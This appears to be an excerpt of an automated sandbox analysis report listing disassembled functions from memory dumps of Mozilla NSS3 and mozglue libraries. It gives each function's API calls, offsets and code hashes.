                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2524771861-0
                                                                                                                                                                                          • Opcode ID: d12dfc787c7128f3bd2eae732b9ace61f4bb9312e0af2c8b45c8357f69974983
                                                                                                                                                                                          • Instruction ID: d1367e2ed2ee84ed07922c0d3c22a2b5ee5c0c4378788d1ca1b525a91212fc3f
                                                                                                                                                                                          • Opcode Fuzzy Hash: d12dfc787c7128f3bd2eae732b9ace61f4bb9312e0af2c8b45c8357f69974983
                                                                                                                                                                                          • Instruction Fuzzy Hash: D0817EB1A00209AFDF10DF69DC85AEE7BB5BF49308F140424ED19A3B11E771E964CBA1
                                                                                                                                                                                          Function 6C544CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PK11_SignatureLen.NSS3(?), ref: 6C544D80
                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000000), ref: 6C544D95
                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C544DF2
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C544E2C
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C544E43
                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C544E58
                                                                                                                                                                                          • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C544E85
                                                                                                                                                                                          • DER_Encode_Util.NSS3(?,?,6C6905A4,00000000), ref: 6C544EA7
                                                                                                                                                                                          • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C544F17
                                                                                                                                                                                          • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C544F45
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C544F62
                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C544F7A
                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C544F89
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C544FC8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2843999940-0
                                                                                                                                                                                          • Opcode ID: bae438986fc6a769b6afc37bdab80a0b0b309870b126e8057a5d1b0f9db84627
                                                                                                                                                                                          • Instruction ID: 1f190f56fa8cfbf3d457bf65a43a19dd5dff77d982b1ad94f9f2ac0be14a66c9
                                                                                                                                                                                          • Opcode Fuzzy Hash: bae438986fc6a769b6afc37bdab80a0b0b309870b126e8057a5d1b0f9db84627
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E817C71948301EFE701CF69DC80B5AB7E8AB88358F14C929F959DB741E731EA05CB92
                                                                                                                                                                                          Function 6C46D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C46D4F0
                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C46D4FC
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C46D52A
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C46D530
                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C46D53F
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C46D55F
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C46D585
                                                                                                                                                                                          • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C46D5D3
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C46D5F9
                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C46D605
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C46D652
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C46D658
                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C46D667
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C46D6A2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2206442479-0
                                                                                                                                                                                          • Opcode ID: 5db5a3b2c169aa722d038a8615b85526bc2d182e7fd73ac8c4fc04bd20f09d33
                                                                                                                                                                                          • Instruction ID: 92bf1cf6cd67443a7f18501773ce8cc6f4c4a6bb206eacddd1c27036dfad1598
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5db5a3b2c169aa722d038a8615b85526bc2d182e7fd73ac8c4fc04bd20f09d33
                                                                                                                                                                                          • Instruction Fuzzy Hash: 04514D71604705DFCB14DF35C888E9ABBB5FF89318F108A2EE95A87B11DB30A945CB91
                                                                                                                                                                                          Function 6C56ADC0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C56ADE6
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C56AE17
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C56AE29
                                                                                                                                                                                            • Part of subcall function 6C64D930: PL_strncpyz.NSS3(?,?,?), ref: 6C64D963
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C56AE3F
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C56AE78
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C56AE8A
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C56AEA0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: L_strncpyzPrint$L_strcatn
                                                                                                                                                                                          • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit$ndl
                                                                                                                                                                                          • API String ID: 332880674-3423121467
                                                                                                                                                                                          • Opcode ID: 355d4b32de62f8be70d44d2ad47fc4177aff21a2a13e62c690093b1cd9739370
                                                                                                                                                                                          • Instruction ID: 37c9dbe5a25a7a222983e4eba59ea90c6b4f9dfd78687a70e3b5436011f438ba
                                                                                                                                                                                          • Opcode Fuzzy Hash: 355d4b32de62f8be70d44d2ad47fc4177aff21a2a13e62c690093b1cd9739370
                                                                                                                                                                                          • Instruction Fuzzy Hash: A331C535A01125EBCB00DF16DC88BAA37B5AB86309F448425E5099BF61DB349D58CB9E
                                                                                                                                                                                          Function 6C566EF0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C566F16
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C566F44
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C566F53
                                                                                                                                                                                            • Part of subcall function 6C64D930: PL_strncpyz.NSS3(?,?,?), ref: 6C64D963
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C566F69
                                                                                                                                                                                          • PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C566F88
                                                                                                                                                                                          • PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C566FA1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                          • String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate$ndl
                                                                                                                                                                                          • API String ID: 1003633598-3944593958
                                                                                                                                                                                          • Opcode ID: f45e3a2ead838198ea9defeda33b875b9fef13329bffbd17ec5437f9a65b9865
                                                                                                                                                                                          • Instruction ID: 2f88ee764cc22a791abf015de98733bb6e56b929516ae42b2334631bc65f8014
                                                                                                                                                                                          • Opcode Fuzzy Hash: f45e3a2ead838198ea9defeda33b875b9fef13329bffbd17ec5437f9a65b9865
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7831D535601111EFDB00DF16DC88B5A77B5EB86318F448025E508A7E25DF309D58CBDD
                                                                                                                                                                                          Function 6C562DD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LogPrint.NSS3(C_InitPIN), ref: 6C562DF6
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C562E24
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C562E33
                                                                                                                                                                                            • Part of subcall function 6C64D930: PL_strncpyz.NSS3(?,?,?), ref: 6C64D963
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C562E49
                                                                                                                                                                                          • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C562E68
                                                                                                                                                                                          • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C562E81
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                          • String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN$ndl
                                                                                                                                                                                          • API String ID: 1003633598-1310409565
                                                                                                                                                                                          • Opcode ID: c96ba3a1c8ea0933ca8c560cdf901dd8f1d932e989fb5880bbf4ccedec2c1c67
                                                                                                                                                                                          • Instruction ID: ea8b340b546c02ba0c6d510acd1f0ae8f044026704d4d137297f4e20cb5888b0
                                                                                                                                                                                          • Opcode Fuzzy Hash: c96ba3a1c8ea0933ca8c560cdf901dd8f1d932e989fb5880bbf4ccedec2c1c67
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8631F175A01115EBCB009F16DC8CBAA37B5EB86318F448025E908ABF61DB309D58CBAD
                                                                                                                                                                                          Function 6C576C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C57781D,00000000,6C56BE2C,?,6C576B1D,?,?,?,?,00000000,00000000,6C57781D), ref: 6C576C40
                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C57781D,?,6C56BE2C,?), ref: 6C576C58
                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C57781D), ref: 6C576C6F
                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C576C84
                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C576C96
                                                                                                                                                                                            • Part of subcall function 6C521240: TlsGetValue.KERNEL32(00000040,?,6C52116C,NSPR_LOG_MODULES), ref: 6C521267
                                                                                                                                                                                            • Part of subcall function 6C521240: EnterCriticalSection.KERNEL32(?,?,?,6C52116C,NSPR_LOG_MODULES), ref: 6C52127C
                                                                                                                                                                                            • Part of subcall function 6C521240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C52116C,NSPR_LOG_MODULES), ref: 6C521291
                                                                                                                                                                                            • Part of subcall function 6C521240: PR_Unlock.NSS3(?,?,?,?,6C52116C,NSPR_LOG_MODULES), ref: 6C5212A0
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C576CAA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                                          • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                                          • API String ID: 4221828374-3736768024
                                                                                                                                                                                          • Opcode ID: d1e09e512f63b653add356cdb31a3d2788079c6519c1cd1234d2d5adc96dcc50
                                                                                                                                                                                          • Instruction ID: c3cdadc22e6b17ddfe6c8c4382e1a5d92b89b8a0f0c148de7b12cc7f34f35222
                                                                                                                                                                                          • Opcode Fuzzy Hash: d1e09e512f63b653add356cdb31a3d2788079c6519c1cd1234d2d5adc96dcc50
                                                                                                                                                                                          • Instruction Fuzzy Hash: E401A2B17023013BEA20277A6C8AF67355CDF52158F140931FE09F1985EE96E51584BD
                                                                                                                                                                                          Function 6C584E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_SetErrorText.NSS3(00000000,00000000,?,6C5478F8), ref: 6C584E6D
                                                                                                                                                                                            • Part of subcall function 6C5209E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C5206A2,00000000,?), ref: 6C5209F8
                                                                                                                                                                                            • Part of subcall function 6C5209E0: malloc.MOZGLUE(0000001F), ref: 6C520A18
                                                                                                                                                                                            • Part of subcall function 6C5209E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C520A33
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C5478F8), ref: 6C584ED9
                                                                                                                                                                                            • Part of subcall function 6C575920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C577703,?,00000000,00000000), ref: 6C575942
                                                                                                                                                                                            • Part of subcall function 6C575920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C577703), ref: 6C575954
                                                                                                                                                                                            • Part of subcall function 6C575920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C57596A
                                                                                                                                                                                            • Part of subcall function 6C575920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C575984
                                                                                                                                                                                            • Part of subcall function 6C575920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C575999
                                                                                                                                                                                            • Part of subcall function 6C575920: free.MOZGLUE(00000000), ref: 6C5759BA
                                                                                                                                                                                            • Part of subcall function 6C575920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C5759D3
                                                                                                                                                                                            • Part of subcall function 6C575920: free.MOZGLUE(00000000), ref: 6C5759F5
                                                                                                                                                                                            • Part of subcall function 6C575920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C575A0A
                                                                                                                                                                                            • Part of subcall function 6C575920: free.MOZGLUE(00000000), ref: 6C575A2E
                                                                                                                                                                                            • Part of subcall function 6C575920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C575A43
                                                                                                                                                                                          • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C584EB3
                                                                                                                                                                                            • Part of subcall function 6C584820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C584EB8,?,?,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C58484C
                                                                                                                                                                                            • Part of subcall function 6C584820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C584EB8,?,?,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C58486D
                                                                                                                                                                                            • Part of subcall function 6C584820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C584EB8,?), ref: 6C584884
                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C584EC0
                                                                                                                                                                                            • Part of subcall function 6C584470: TlsGetValue.KERNEL32(00000000,?,6C547296,00000000), ref: 6C584487
                                                                                                                                                                                            • Part of subcall function 6C584470: EnterCriticalSection.KERNEL32(?,?,?,6C547296,00000000), ref: 6C5844A0
                                                                                                                                                                                            • Part of subcall function 6C584470: PR_Unlock.NSS3(?,?,?,?,6C547296,00000000), ref: 6C5844BB
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C584F16
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C584F2E
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C584F40
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C584F6C
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C584F80
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C584F8F
                                                                                                                                                                                          • PK11_UpdateSlotAttribute.NSS3(?,6C65DCB0,00000000), ref: 6C584FFE
                                                                                                                                                                                          • PK11_UserDisableSlot.NSS3(0000001E), ref: 6C58501F
                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C58506B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 560490210-0
                                                                                                                                                                                          • Opcode ID: eb6dae9be4fa94988bca07899d7efa945ec00637fe18b19ba04d7c617c1c7992
                                                                                                                                                                                          • Instruction ID: 3e7d81d6bda0fa3109b8a38ab9e63ebe103f46486b210f3662052465643508d5
                                                                                                                                                                                          • Opcode Fuzzy Hash: eb6dae9be4fa94988bca07899d7efa945ec00637fe18b19ba04d7c617c1c7992
                                                                                                                                                                                          • Instruction Fuzzy Hash: B751E4B1902222DBEB11AF25EC45A9B37B8EF4531CF544635EC0646B12FB31D958CAE2
                                                                                                                                                                                          Function 6C52ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 786543732-0
                                                                                                                                                                                          • Opcode ID: 324b47fe91fd58b50f2bff1ca771a2e6d49b662aff0f0c424dffca20a8c39004
                                                                                                                                                                                          • Instruction ID: 5bddcf8f3778d28f249bd35e9c210bd1bdfcd24c41d6bf0fa57516c223338c77
                                                                                                                                                                                          • Opcode Fuzzy Hash: 324b47fe91fd58b50f2bff1ca771a2e6d49b662aff0f0c424dffca20a8c39004
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4651C1B1E01216EBDF00DF59DCC16AE77F8BB46348F144525D815A3B90E339A909CBEA
